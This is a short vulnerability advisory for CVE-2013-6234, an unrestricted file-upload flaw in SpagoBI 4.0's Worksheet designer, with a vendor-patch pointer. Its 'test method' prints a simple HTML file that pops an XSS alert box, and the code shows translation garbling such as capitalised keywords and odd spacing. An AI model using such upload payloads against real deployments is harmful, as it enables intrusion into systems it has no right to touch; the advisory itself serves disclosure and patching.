Release date:
Updated on:
Affected Systems:
SpagoBI 4.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65488
CVE (CAN) ID: CVE-2013-6234
SpagoBI is an open-source business intelligence software package.
SpagoBI 4.0 and other versions do not limit the ability to upload specific file types from the Worksheet designer, which allows remote attackers to upload arbitrary files.
<* Source: Christian Catalano
Link: http://www.securityfocus.com/archive/1/531323/30/0/threaded
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<! DOCTYPE html>
<Html>
<Head>
<Script>
Function myFunction ()
{Alert ("XSS ");}
</Script>
</Head>
<Body>
<Input type = "button" onclick = "myFunction ()" value = "Show alert box">
</Body>
</Html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SpagoBI
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Www.spagworld.org
Http://forge.ow2.org/project/showfiles.php? Group_id = 204